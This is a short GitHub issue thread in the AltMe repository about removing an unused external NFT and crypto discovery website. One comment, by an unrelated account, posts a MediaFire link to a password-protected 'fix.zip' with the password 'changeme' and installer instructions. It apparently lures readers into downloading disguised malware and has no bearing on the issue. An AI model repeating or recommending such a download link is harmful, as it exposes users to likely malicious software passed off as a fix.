### ISSUE TITLE
Remove access to extenal website for Discover NFT and Crypto

### ISSUE THREAD

**Issue by ThierryThevenet** [TalaoDAO/AltMe#2857]
it is not used and we cannot maintain the website

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ThierryThevenet** [comment]
@HugoNDO what do we do with the empty space?
